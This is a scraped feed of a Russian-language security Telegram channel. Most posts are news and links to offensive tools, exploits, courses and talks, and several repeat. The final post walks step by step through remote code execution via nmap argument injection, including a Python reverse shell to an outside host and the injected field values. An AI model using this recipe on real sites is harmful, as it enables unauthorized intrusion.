Forwarded from Security Harvester (securityharvester)
Credentials Dumper for Linux using eBPF - https://github.com/citronneur/pamspy
👍2
💥Tj Null из Offensive Security делится последними наработками создания боевого офисного документа, используя технику абьюза скрытого функционала в свойствах документа.
Пару месяцев назад компания Microsoft сообщила, что изменит дефолтное поведение при открытии документов с макросами. Теперь по умолчанию все документы полученные извне, при открытии не позволят нажать заветную кнопочку «Enable Content», ее просто нет) Вместо нее теперь будет уведомление Security Risk и «Learn more».
Кажется эпоха фишинга с макросами уходит окончательно и появляются новые методы обхода.
God save Microsoft!
🔥 PoC пока работает с последней версией Windows 11 и Microsoft Office 2021.
https://www.offensive-security.com/offsec/macro-weaponization/
Пару месяцев назад компания Microsoft сообщила, что изменит дефолтное поведение при открытии документов с макросами. Теперь по умолчанию все документы полученные извне, при открытии не позволят нажать заветную кнопочку «Enable Content», ее просто нет) Вместо нее теперь будет уведомление Security Risk и «Learn more».
Кажется эпоха фишинга с макросами уходит окончательно и появляются новые методы обхода.
God save Microsoft!
🔥 PoC пока работает с последней версией Windows 11 и Microsoft Office 2021.
https://www.offensive-security.com/offsec/macro-weaponization/
Docs
Macros from the internet are blocked by default in Office - Microsoft 365 Apps
Provides guidance for admins about how Office blocks macros in files from the internet.
Forwarded from Поросёнок Пётр
Мой бро @gadanienacoffee напилил тут неплохую презу о том как можно делать аппсекс .
PS: А еще у них там вакансии есть
PS: А еще у них там вакансии есть
YouTube
Как построить security review, который приносит пользу и не тормозит разработку / Антон Булавин
Приглашаем на TechLead Conf X 2025, которая пройдет 5 июня в Москве.
Программа, подробности и билеты по ссылке https://bit.ly/3PZN1hk
---------
Объединенная конференция DevOpsConf и TechLead Conf
13 и 14 июня 2022
Тезисы и презентация:
https://techlea…
Программа, подробности и билеты по ссылке https://bit.ly/3PZN1hk
---------
Объединенная конференция DevOpsConf и TechLead Conf
13 и 14 июня 2022
Тезисы и презентация:
https://techlea…
Forwarded from Web3 bounty plz
Рамазан @r0hack поделился на своем канале.
Интервью само-по-себе достаточно интересное, советую послушать 🙂
НО, что реально ценного я оттуда вынес – это узнал про платформу code4rena.com.
Если вам интересно попробовать себя в поиске уязвимостей в смарт-контрактах – имхо, это лучший вариант для старта. Объясняю, почему:
1) Эта платформа коллективного аудита смарт-контрактов, туда часто попадают еще слабо (или вообще не) аудированные смарт-контракты. Соответственно, высок шанс найти даже примитивные баги.
2) Платят за дубликаты, что опять же огромный плюс. Суть такая, что есть некий фиксированный баунти-пул, который сначала делится на все баги (согласно их критичности), а в рамках одного бага – на всех, кто его нашел.
3) Никакого KYC в большинстве случаев, а значит, welcome Russian researchers.
4) Доступны более или менее подробные протоколы прошлых аудитов: https://code4rena.com/reports. Это как открытые отчеты на H1 – также очень круто, можно учиться на чужих находках.
Интервью само-по-себе достаточно интересное, советую послушать 🙂
НО, что реально ценного я оттуда вынес – это узнал про платформу code4rena.com.
Если вам интересно попробовать себя в поиске уязвимостей в смарт-контрактах – имхо, это лучший вариант для старта. Объясняю, почему:
1) Эта платформа коллективного аудита смарт-контрактов, туда часто попадают еще слабо (или вообще не) аудированные смарт-контракты. Соответственно, высок шанс найти даже примитивные баги.
2) Платят за дубликаты, что опять же огромный плюс. Суть такая, что есть некий фиксированный баунти-пул, который сначала делится на все баги (согласно их критичности), а в рамках одного бага – на всех, кто его нашел.
3) Никакого KYC в большинстве случаев, а значит, welcome Russian researchers.
4) Доступны более или менее подробные протоколы прошлых аудитов: https://code4rena.com/reports. Это как открытые отчеты на H1 – также очень круто, можно учиться на чужих находках.
🔥1
Forwarded from cocomelonc
Forwarded from b4tr_ch
Парень с Казахстана написал книгу по Malware Development. У Жасулана сейчас не простая ситуация, связанная с болезнью дочери и он через книгу собирает деньги на ее лечение.
Книга на английском языке. Возможно будет полезна и давайте поддержим парня. Электронная книга, стоимость всего 16 долларов.
У Жасулана так же есть Каспи: +77087235263 для тех кто просто хочет поддержать парня.
Книга на английском языке. Возможно будет полезна и давайте поддержим парня. Электронная книга, стоимость всего 16 долларов.
У Жасулана так же есть Каспи: +77087235263 для тех кто просто хочет поддержать парня.
Forwarded from k8s (in)security (Дмитрий Евдокимов)
Недавно был на одном закрытом мероприятии, где большая часть программы была посвящена расследованию инцидентов. Там удалось познакомиться и пообщаться с крутыми специалистами по расследованию инцидентов - именно их усилиями получается выяснить что, как, кем было совершено нехорошего в вашей инфраструктуре.
Отдельно с ними пообсуждали тему расследования инцидентов в контейнерах средах –
1) Случаев и запросов на расследование инцидентов в контейнерах средах становится все больше.
2) Подобные расследования становятся ночным кошмаром для специалистов, если в инфраструктуре заранее не были предусмотрены соответствующие инструменты и практики. А таких инфраструктур, к сожалению, сейчас абсолютное большинство и помочь получается редко.
3) Сошлись на мнении что приложения в контейнерах проще/лучше грамотно защитить, чем потом пытать там что-то либо расследовать ввиду специфики работы контейнеров и оркестраторов.
О своем взгляде на все это я расскажу в докладе "Специфика расследования инцидентов в контейнерах" (доклад пока в стадии рассмотрения
Отдельно с ними пообсуждали тему расследования инцидентов в контейнерах средах –
Kubernetes. В итоге могу поделиться следующей информацией:1) Случаев и запросов на расследование инцидентов в контейнерах средах становится все больше.
2) Подобные расследования становятся ночным кошмаром для специалистов, если в инфраструктуре заранее не были предусмотрены соответствующие инструменты и практики. А таких инфраструктур, к сожалению, сейчас абсолютное большинство и помочь получается редко.
3) Сошлись на мнении что приложения в контейнерах проще/лучше грамотно защитить, чем потом пытать там что-то либо расследовать ввиду специфики работы контейнеров и оркестраторов.
О своем взгляде на все это я расскажу в докладе "Специфика расследования инцидентов в контейнерах" (доклад пока в стадии рассмотрения
CFP конференции).Telegram
k8s (in)security
Время от времени вы уважаемые читатели спрашиваете, когда и где я еще буду выступать с новыми докладами. Пока конкретные даты и конференции назвать не могу, так как CFP еще идут. Но могу рассказать какие темы я сейчас уже готовлю на конец этого года:
1) "Специфика…
1) "Специфика…
🚨The Linux Foundation в честь дня сисадмина устроила акцию!
🤑 До конца июля можно приобрести курсы со скидкой -200$!
🤑 Экзамены со скидкой -100$!
Го сдавать Certified Kubernetes Administrator!
https://training.linuxfoundation.org/july-2022-promo/
🤑 До конца июля можно приобрести курсы со скидкой -200$!
🤑 Экзамены со скидкой -100$!
Го сдавать Certified Kubernetes Administrator!
https://training.linuxfoundation.org/july-2022-promo/
Linux Foundation - Training
Promo Inactive - Linux Foundation - Training
Sign up for our newsletter to get updates on our latest promotions.
Forwarded from k8s (in)security (Дмитрий Евдокимов)
Я думаю, что сегодня все понятно просто по стартовой картинке =)
Да, оказывается уже есть OWASP Kubernetes Top 10! Проект молодой и еще не до конца доделанный - на текущие момент описано
-
K01:2022 Insecure Workload Configurations
K02:2022 Supply Chain Vulnerabilities
K03:2022 Overly Permissive RBAC Configurations
K04:2022 Lack of Centralized Policy Enforcement
K05:2022 Inadequate Logging and Monitoring
K06:2022 Broken Authentication Mechanisms
K07:2022 Missing Network Segmentation Controls
K08:2022 Secrets Management Failures
K09:2022 Misconfigured Cluster Components
K10:2022 Outdated and Vulnerable Kubernetes Components
Какое мое мнение по этому рейтингу? Напишу в завтрашнем посте ;)
Да, оказывается уже есть OWASP Kubernetes Top 10! Проект молодой и еще не до конца доделанный - на текущие момент описано
7 или 10 пунктов (хотя и у тех 7 внутри не все еще готово). По задумке авторов каждый из пунктов состоит из разделов:-
Overview
- Description
- How to Prevent
- Example Attack Scenarios
- References
Сам рейтинг:K01:2022 Insecure Workload Configurations
K02:2022 Supply Chain Vulnerabilities
K03:2022 Overly Permissive RBAC Configurations
K04:2022 Lack of Centralized Policy Enforcement
K05:2022 Inadequate Logging and Monitoring
K06:2022 Broken Authentication Mechanisms
K07:2022 Missing Network Segmentation Controls
K08:2022 Secrets Management Failures
K09:2022 Misconfigured Cluster Components
K10:2022 Outdated and Vulnerable Kubernetes Components
Какое мое мнение по этому рейтингу? Напишу в завтрашнем посте ;)
Forwarded from Мониторим ИТ
Решаем проблему раннего обнаружения уязвимостей в коде
📅 26 июля в 18:00 по мск в Слёрм пройдёт вебинар «Решаем проблему раннего обнаружения уязвимостей в коде». Вы узнаете, как Jenkins работает с утилитами SonarQube, Dependency Check и Clair, и поймёте, как он помогает находить уязвимости в коде на ранних стадиях. А ещё на практике разберёте пайплайн, который выполняет проверки и уведомляет о найденных уязвимостях.
Кому будет полезно
Вебинар посвящён всегда актуальной теме безопасности приложений и ориентирован на DevOps-инженеров и тех, кто интересуется DevSecOps.
Чем займёмся на вебинаре
📌 Разберём, насколько совместим Jenkins с такими системами и утилитами как SonarQube, Dependency Check и Clair.
📌 Покажем, как на ранних стадиях находить уязвимости в коде, зависимостях и Docker-образах.
📌 Рассмотрим конкретный пайплайн, который выполняет проверки и уведомляет о найденных уязвимостях.
Спикер
Разобраться в тонкостях работы с Jenkins вам поможет Кирилл Борисов — Infrastructure Engineer технологического центра Deutsche Bank.
Участие в вебинаре бесплатное, но чтобы получить ссылку на трансляцию, нужно занять место заранее 👉 https://slurm.club/3zjs09M
📅 26 июля в 18:00 по мск в Слёрм пройдёт вебинар «Решаем проблему раннего обнаружения уязвимостей в коде». Вы узнаете, как Jenkins работает с утилитами SonarQube, Dependency Check и Clair, и поймёте, как он помогает находить уязвимости в коде на ранних стадиях. А ещё на практике разберёте пайплайн, который выполняет проверки и уведомляет о найденных уязвимостях.
Кому будет полезно
Вебинар посвящён всегда актуальной теме безопасности приложений и ориентирован на DevOps-инженеров и тех, кто интересуется DevSecOps.
Чем займёмся на вебинаре
📌 Разберём, насколько совместим Jenkins с такими системами и утилитами как SonarQube, Dependency Check и Clair.
📌 Покажем, как на ранних стадиях находить уязвимости в коде, зависимостях и Docker-образах.
📌 Рассмотрим конкретный пайплайн, который выполняет проверки и уведомляет о найденных уязвимостях.
Спикер
Разобраться в тонкостях работы с Jenkins вам поможет Кирилл Борисов — Infrastructure Engineer технологического центра Deutsche Bank.
Участие в вебинаре бесплатное, но чтобы получить ссылку на трансляцию, нужно занять место заранее 👉 https://slurm.club/3zjs09M
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2022-34918: Linux Kernel LPE PoC
https://github.com/randorisec/CVE-2022-34918-LPE-PoC
+ ресерч: https://randorisec.fr/crack-linux-firewall/
#exploit #git
https://github.com/randorisec/CVE-2022-34918-LPE-PoC
+ ресерч: https://randorisec.fr/crack-linux-firewall/
#exploit #git
DiagTrackEoP
Just another way to abuse SeImpersonate privilege.
#Windows #Privesc
https://github.com/Wh04m1001/DiagTrackEoP
Just another way to abuse SeImpersonate privilege.
#Windows #Privesc
https://github.com/Wh04m1001/DiagTrackEoP
GitHub
GitHub - Wh04m1001/DiagTrackEoP
Contribute to Wh04m1001/DiagTrackEoP development by creating an account on GitHub.
Devious Methods
Joey Bada$$ - 2000 (Album Promo) | 6.17.22 https://www.youtube.com/watch?v=LXbh4Q3LBvI
YouTube
Joey Bada$$ - Where I Belong (Official Video)
Official video for “Where I Belong” by Joey Bada$$
Listen & Download “Where I Belong” out now: https://joeybadass.lnk.to/WhereIBelong
Amazon Music - https://joeybadass.lnk.to/WhereIBelong/amazonmusic
Apple Music - https://joeybadass.lnk.to/WhereIBelong/applemusic…
Listen & Download “Where I Belong” out now: https://joeybadass.lnk.to/WhereIBelong
Amazon Music - https://joeybadass.lnk.to/WhereIBelong/amazonmusic
Apple Music - https://joeybadass.lnk.to/WhereIBelong/applemusic…
Forwarded from linkmeup
Пока сетевики учили питон, он протух, и надо начинать учить Go.
Пока сетевики думали внедрять NETCONF, он протух, и надо начинать внедрять gNMI.
Чуете, чем пахнет? Пахнет очередным хайпом, который обещает волной снести старый мир и на его руинах построить новый. С чем мы и разбираемся в последнем telecom-подкасте.
https://linkmeup.ru/podcasts/2196/
https://youtu.be/aX-2r-tNxvQ
Пока сетевики думали внедрять NETCONF, он протух, и надо начинать внедрять gNMI.
Чуете, чем пахнет? Пахнет очередным хайпом, который обещает волной снести старый мир и на его руинах построить новый. С чем мы и разбираемся в последнем telecom-подкасте.
https://linkmeup.ru/podcasts/2196/
https://youtu.be/aX-2r-tNxvQ
linkmeup
telecom №113. gNMI - linkmeup
С АДСМ 5 и 6 мне помогал Роман Додин - инженер Nokia, автор блога netdevops.me и соавтор утилиты gNMIc. И мы с ним договорились, надолго не затягивая, провести подкаст на тему самого блидинг-эдж интерфейса сетевой автоматизации - gNMI. История …
#SOC #Blueteam #Threathunting
Боевик по мотивам противостояния Standoff 11 2022. В главных ролях: Codeby team, PT SOC team.
https://habr.com/ru/company/pt/blog/678832/
Боевик по мотивам противостояния Standoff 11 2022. В главных ролях: Codeby team, PT SOC team.
https://habr.com/ru/company/pt/blog/678832/
Хабр
Письмо ценой катастрофы: расследуем атаку на The Standoff, используя продукты Positive Technologies
Привет! В мае прошел очередной, уже 11-й, PHDays, а вместе с ним и The Standoff , и мы, как обычно, не остались без кейсов интересных атак. В этот раз мы решили не описывать отдельные техники и...
👍3
Цикл статей об атаках на AD. Перевод c https://zer1t0.gitlab.io/posts/attacking_ad/
#AD #Redteam #pentest
https://defcon.ru/penetration-testing/18872/
#AD #Redteam #pentest
https://defcon.ru/penetration-testing/18872/
👍2
#OffensiveSecurity понимают что нужно успевать за трендами и открывают новое направление своих курсов в области безопасности облаков - CLD-100.
CLD-100 is fundamental cloud security training for individuals that want to start working towards a specialization in cloud security.
The content in this new training is completely vendor-neutral and will teach students the underlying security concepts of cloud computing. This means that it will provide you with the fundamentals of the technologies and security considerations that underpin the cloud in such a way that can be applied to any cloud vendor, be it Amazon Web Services, Google Cloud, or Microsoft Azure.
With this release, you will be able to access the following cloud security Topics, with more Topics to be released continuously:
Introduction to Cloud 100
Containers for Cloud
Introduction to Kubernetes
Discovering Exposed Docker Sockets
Discovering Exposed Kubernetes Dashboards
Ждём более практический и «хакерский» курс CLD-200!
CLD-100 is fundamental cloud security training for individuals that want to start working towards a specialization in cloud security.
The content in this new training is completely vendor-neutral and will teach students the underlying security concepts of cloud computing. This means that it will provide you with the fundamentals of the technologies and security considerations that underpin the cloud in such a way that can be applied to any cloud vendor, be it Amazon Web Services, Google Cloud, or Microsoft Azure.
With this release, you will be able to access the following cloud security Topics, with more Topics to be released continuously:
Introduction to Cloud 100
Containers for Cloud
Introduction to Kubernetes
Discovering Exposed Docker Sockets
Discovering Exposed Kubernetes Dashboards
Ждём более практический и «хакерский» курс CLD-200!
Forwarded from One brick to the IT world
Очень давно был интересный кейс с сайтом для системных администраторов, где можно было проверить открыт ли порт сайта. Первое, что пришло голову, это вписать в IP:
В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.
0) На своем сервере открываем порт 8888:
1) Создаем у себя на сервере файл index.php с содержимым:
4) Запускаем скачанный скрипт, вписав вместо порта:
Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.
Вот такой вот зиродей😁
#case #nmap #research #rce
127.0.0.1 -hВ результате сайт вернул мануал nmap-a. Но многие символы фильтровались и выйти за переделы команды nmap-а не удалось. После этого, путем проб и ошибок, был найден интересный вектор remote code execution.
В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.
0) На своем сервере открываем порт 8888:
nc -lvp 8888Допустим IP вашего сервера 1.1.1.1
1) Создаем у себя на сервере файл index.php с содержимым:
os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")
2) Запускаем встроенный сервер php:php -S 0.0.0.0:80803) На атакуемом сайте вместо IP пишем:
1.1.1.1 -script http-fetchВместо порта:
8080 -dd -script-args destination=/tmpТ.е. на бэкенде сайта команда преобразуется в что-то типа:
nmap 1.1.1.1 -script http-fetch -p 8080 -dd -script-args destination=/tmpВ результате выполнения этой команды, по пути
/tmp/1.1.1.1/8080/index.html будет лежат скрипт с первого шага.4) Запускаем скачанный скрипт, вписав вместо порта:
8080 -dd -script /tmp/1.1.1.1/8080/index.htmlи получаем бэкконнект.
Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.
Вот такой вот зиродей😁
#case #nmap #research #rce
🔥3